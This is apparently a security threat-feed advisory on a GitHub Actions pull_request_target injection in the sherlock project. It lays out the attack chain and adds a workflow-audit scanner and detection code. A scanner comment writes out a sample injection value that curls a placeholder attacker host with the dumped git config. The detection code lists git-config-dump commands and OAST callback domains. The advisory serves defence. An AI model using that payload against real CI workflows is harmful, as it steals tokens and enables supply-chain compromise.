Threat Feed
critical advisory

sherlock-project/sherlock GitHub Actions RCE via pull_request_target Injection (CVE-2026-44590)

A command injection vulnerability, identified as CVE-2026-44590, exists in the `validate_modified_targets.yml` GitHub Actions workflow of sherlock-project/sherlock. A malicious pull request can trigger arbitrary command execution in the privileged CI context, allowing attackers to exfiltrate the GITHUB_TOKEN and auto-approve the malicious PR without human interaction, effectively leading to a supply chain compromise.

CVE-2026-44590 is a critical command injection vulnerability in the validate_modified_targets.yml GitHub Actions workflow of the sherlock-project/sherlock repository, discovered and reported by Astaruf. Any GitHub user can open a pull request from a fork that triggers arbitrary command execution in the privileged Continuous Integration (CI) environment. The root cause is the workflow's use of the pull_request_target event: unlike pull_request, it runs in the context of the base repository, so the job receives a GITHUB_TOKEN with the base repository's permissions (write by default) and access to repository secrets even when the pull request comes from a fork. Because the workflow interpolates attacker-controlled pull request data into a shell step without sanitization, the PR author can inject commands that run with those privileges. The reported exploit uses this to exfiltrate the GITHUB_TOKEN and approve the malicious pull request through the GitHub API, opening the way to a supply chain compromise with no human review. The published proof-of-concept (PoC) automates the entire chain, which underlines both the severity and the ease of exploitation.

Attack Chain

  1. Attacker forks the sherlock-project/sherlock repository.
  2. Attacker pushes a branch to the fork whose content carries the injection payload aimed at the validate_modified_targets.yml workflow.
  3. Attacker opens a pull request (PR) from that branch against the master branch of the upstream sherlock-project/sherlock repository. This fires the pull_request_target event, which runs the upstream copy of the workflow with the upstream repository's GITHUB_TOKEN.
  4. The workflow expands the attacker-controlled value inside a shell step, so the injected commands execute in the privileged runner and can read and exfiltrate sensitive data.
  5. The payload runs `git config --list`. actions/checkout persists the GITHUB_TOKEN by default (persist-credentials: true) as an http extraheader in the checkout's git config, a base64-encoded basic credential, so the dump exposes the token.
  6. The stolen GITHUB_TOKEN is used to authenticate against the GitHub API. The token is only valid while the job is running, so the remaining steps must happen from inside the job or immediately after exfiltration.
  7. The attacker submits an approving review on the malicious pull request via the GitHub API, specifically the POST /repos/{owner}/{repo}/pulls/{pull_number}/reviews endpoint.
  8. With the automated approval in place, the malicious PR can be merged, resulting in a supply chain compromise.

Impact

Successful exploitation of CVE-2026-44590 can lead to a full supply chain compromise. An attacker could land malicious code in the sherlock-project/sherlock repository (or in any fork that runs the same workflow), reaching everyone who installs or updates the software and every project that depends on it. Because the chain is fully automated, from token exfiltration to the approving review, it needs no mistake by a maintainer and no human interaction; the only remaining barrier is whatever branch protection requires beyond an approval.

Recommendation

  • Monitor GitHub Actions workflow execution logs and runner process telemetry for unusual command invocations, particularly `git config --list` or other reads of the checkout's git configuration, and for outbound callbacks to hosts the workflow has no reason to contact.
  • Never interpolate pull-request-controlled expressions (github.event.*, github.head_ref) directly into run: scripts; pass them through environment variables so the shell treats them as data. Where pull_request_target is genuinely needed, do not check out or execute code from the pull request head in the privileged job, and set persist-credentials: false on actions/checkout. Prefer the pull_request trigger where possible, since it gives fork PRs a read-only GITHUB_TOKEN and no secrets.
  • Enforce strict branch protection rules and require code review by multiple trusted developers before merging any pull requests, even those approved by GitHub Actions.
  • Deploy the Sigma rule Detect Suspicious Sherlock GitHub Actions Workflow Activity to detect potential exploitation attempts by monitoring process creation events.
  • Review and audit existing GitHub Actions workflows for similar vulnerabilities and apply necessary security patches or mitigations.
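The workflow shape behind steps 2 to 5 of the attack chain and the hardening in the recommendations above, as an added example that is not the sherlock project's own code or workflow: a dependency-free scanner that flags run: steps interpolating PR-controlled expressions, checks for the pull_request_target trigger, and reports actions/checkout steps that leave the token in .git/config. Both sample workflows are constructed for illustration; neither is the real validate_modified_targets.yml, and the field names and payload shown in the comment are assumptions about the general pattern, not details from the advisory.

```python
"""Audit GitHub Actions workflow text for the pull_request_target injection pattern."""
import re

# On pull_request* events everything under github.event.* (PR title, body, branch
# name, commit messages, ...) and github.head_ref is chosen by the PR author. The
# runner expands ${{ }} before bash parses the script, so a value such as
#   x"; curl https://attacker.example/$(git config --list | base64 -w0); echo "
# becomes commands (attacker.example is a placeholder, not a real host).
UNTRUSTED_EXPR = re.compile(r"\$\{\{\s*github\.(?:event\.[\w.\[\]*-]+|head_ref)\s*\}\}")
RUN_KEY = re.compile(r"^(\s*(?:-\s*)?)run:\s*(.*)$")
CHECKOUT_KEY = re.compile(r"^(\s*(?:-\s*)?)uses:\s*actions/checkout")
BLOCK_SCALAR = re.compile(r"^[|>][+-]?\s*$")


def indent_of(line: str) -> int:
    return len(line) - len(line.lstrip())


def uses_pull_request_target(workflow: str) -> bool:
    """Heuristic: the privileged trigger appears anywhere in the workflow text."""
    return re.search(r"\bpull_request_target\b", workflow) is not None


def find_injection_sinks(workflow: str) -> list[tuple[int, str]]:
    """(line_number, expression) for each untrusted ${{ }} inside a run: script.

    A line scanner is used instead of a YAML parser so the check has no
    dependencies; 'run: |' block scalars are followed by indentation.
    """
    findings, lines, i = [], workflow.splitlines(), 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent, rest = len(m.group(1)), m.group(2)
        if BLOCK_SCALAR.match(rest):
            j = i + 1
            while j < len(lines) and (not lines[j].strip() or indent_of(lines[j]) > key_indent):
                findings += [(j + 1, e.group(0)) for e in UNTRUSTED_EXPR.finditer(lines[j])]
                j += 1
            i = j
        else:
            findings += [(i + 1, e.group(0)) for e in UNTRUSTED_EXPR.finditer(rest)]
            i += 1
    return findings


def checkout_keeps_token(workflow: str) -> bool:
    """True if any actions/checkout step lacks 'persist-credentials: false'.

    With the default (true) actions/checkout writes the GITHUB_TOKEN into
    .git/config as an http extraheader, which is what 'git config --list'
    exposes in step 5 of the attack chain.
    """
    lines = workflow.splitlines()
    for i, line in enumerate(lines):
        m = CHECKOUT_KEY.match(line)
        if not m:
            continue
        key_indent, j, persisted = len(m.group(1)), i + 1, True
        # Step body: sibling keys (with:) and their children, up to the next list item.
        while j < len(lines) and indent_of(lines[j]) >= key_indent and not lines[j].lstrip().startswith("- "):
            if re.match(r"^\s*persist-credentials:\s*false\s*$", lines[j]):
                persisted = False
            j += 1
        if persisted:
            return True
    return False


def audit(workflow: str) -> dict:
    return {
        "privileged_trigger": uses_pull_request_target(workflow),
        "injection_sinks": find_injection_sinks(workflow),
        "checkout_keeps_token": checkout_keeps_token(workflow),
    }


# Constructed samples; neither is the real validate_modified_targets.yml.
VULNERABLE = """\
name: validate-targets (illustrative, vulnerable)
on:
  pull_request_target:
    branches: [master]
jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: |
          # the runner expands the expression before bash parses this script
          echo "Validating targets for: ${{ github.event.pull_request.title }}"
          python tools/validate.py
"""

HARDENED = """\
name: validate-targets (illustrative, hardened)
on:
  pull_request_target:
    branches: [master]
jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4        # base branch only: PR code never runs here
        with:
          persist-credentials: false
      - env:
          PR_TITLE: ${{ github.event.pull_request.title }}   # handed over as data
        run: |
          echo "Validating targets for: $PR_TITLE"
          python tools/validate.py
"""

if __name__ == "__main__":
    for name, wf in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(name, audit(wf))
```

Run over a whole .github/workflows directory, any file where privileged_trigger is true and injection_sinks is non-empty is the pattern this advisory describes; checkout_keeps_token on its own is a weaker finding, but it is the setting that turns a shell in the runner into a token theft.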

Detection coverage (2 rules)

Detect Suspicious Sherlock GitHub Actions Workflow Activity

Severity: high

Detects suspicious activity within Sherlock GitHub Actions workflows, specifically looking for command execution that attempts to exfiltrate secrets.

Sigma rule. Tactics: credential_access, execution. Techniques: T1059.004, T1552.001. Log source: process_creation (linux).

Detect OAST Callback from GitHub Actions Workflow

Severity: medium

Detects outbound network connections from GitHub Actions workflows to known OAST (Out-of-Band Application Security Testing) services.

Sigma rule. Tactics: command_and_control. Techniques: T1071.001. Log source: network_connection (linux).
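The logic of the two rules described above, replayed over sample telemetry, as an added example: this is not the platform's Sigma rules (the page only describes them) but an illustration of the same two detections, a git config dump inside a runner checkout and an outbound connection to an OAST callback domain. The event records are constructed, the field names follow the Sigma process_creation and network_connection taxonomy, and the OAST domain list and rule names are assumptions, not values from the advisory.

```python
"""Replay the advisory's two detection ideas over constructed runner telemetry."""
import shlex

# interactsh and Burp Collaborator callback domains; illustrative, not exhaustive.
OAST_DOMAINS = ("oast.fun", "oast.live", "oast.me", "oast.online", "oast.pro", "oast.site",
                "interact.sh", "burpcollaborator.net", "oastify.com")
RUNNER_WORKDIR = "/home/runner/work/"   # where GitHub-hosted runners check out repositories


def dumps_git_config(argv: list[str]) -> bool:
    """git invocations that print the whole config or the extraheader holding the token."""
    return any(a in ("--list", "-l", "--get-regexp") or "extraheader" in a for a in argv[1:])


def is_secret_dump(ev: dict) -> bool:
    """process_creation: git reading the whole config, or .git/config read directly,
    from inside a runner checkout (T1552.001 via a shell, T1059.004)."""
    if not ev.get("CurrentDirectory", "").startswith(RUNNER_WORKDIR):
        return False
    argv = shlex.split(ev.get("CommandLine", ""))
    if not argv:
        return False
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "git" and "config" in argv[1:]:
        return dumps_git_config(argv)
    return prog in ("cat", "grep", "strings") and any(a.endswith(".git/config") for a in argv[1:])


def is_oast_callback(ev: dict) -> bool:
    """network_connection: outbound connection to a known OAST callback domain (T1071.001)."""
    host = ev.get("DestinationHostname", "").lower().rstrip(".")
    return bool(ev.get("Initiated", False)) and any(host == d or host.endswith("." + d) for d in OAST_DOMAINS)


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event_index, rule_name) for every matching event."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventType") == "process_creation" and is_secret_dump(ev):
            hits.append((i, "sherlock_workflow_secret_dump"))
        elif ev.get("EventType") == "network_connection" and is_oast_callback(ev):
            hits.append((i, "oast_callback"))
    return hits


# Constructed telemetry; none of it is real.
SAMPLE_EVENTS = [
    {"EventType": "process_creation", "CurrentDirectory": "/home/runner/work/sherlock/sherlock",
     "ParentImage": "/usr/bin/bash", "CommandLine": "git config --get remote.origin.url"},   # benign
    {"EventType": "process_creation", "CurrentDirectory": "/home/runner/work/sherlock/sherlock",
     "ParentImage": "/usr/bin/bash", "CommandLine": "git config --list"},                   # step 5
    {"EventType": "process_creation", "CurrentDirectory": "/home/runner/work/sherlock/sherlock",
     "ParentImage": "/usr/bin/bash", "CommandLine": "cat .git/config"},                     # same goal
    {"EventType": "process_creation", "CurrentDirectory": "/home/dev/sherlock",
     "ParentImage": "/usr/bin/zsh", "CommandLine": "git config --list"},                    # developer box
    {"EventType": "network_connection", "Image": "/usr/bin/curl", "Initiated": True,
     "DestinationHostname": "api.github.com", "DestinationPort": 443},                      # benign
    {"EventType": "network_connection", "Image": "/usr/bin/curl", "Initiated": True,
     "DestinationHostname": "cg7k2x1q.oast.fun", "DestinationPort": 443},                   # callback
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"{rule:32} {ev.get('CommandLine') or ev.get('DestinationHostname')}")
```

The CurrentDirectory prefix keeps ordinary developer use of `git config --list` out of the result set; on self-hosted runners adjust RUNNER_WORKDIR to the runner's work directory. Note that an exfiltration to an attacker-owned host rather than an OAST service is not caught by the second rule, which is why the advisory also recommends watching for any unexpected outbound connection.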


Indicators of compromise (5, all of type url; these are reference links, not network indicators to block)

  • https://sploitus.com/exploit?id=B265A4A6-887B-55F2-A0B7-038269601502
  • https://nstsec.com/en/posts/sherlock-rce-pull-request-target-cve-2026-44590/
  • https://github.com/sherlock-project/sherlock/security/advisories
  • https://nvd.nist.gov/vuln/detail/CVE-2026-44590
  • https://vulners.com/cve/CVE-2026-44590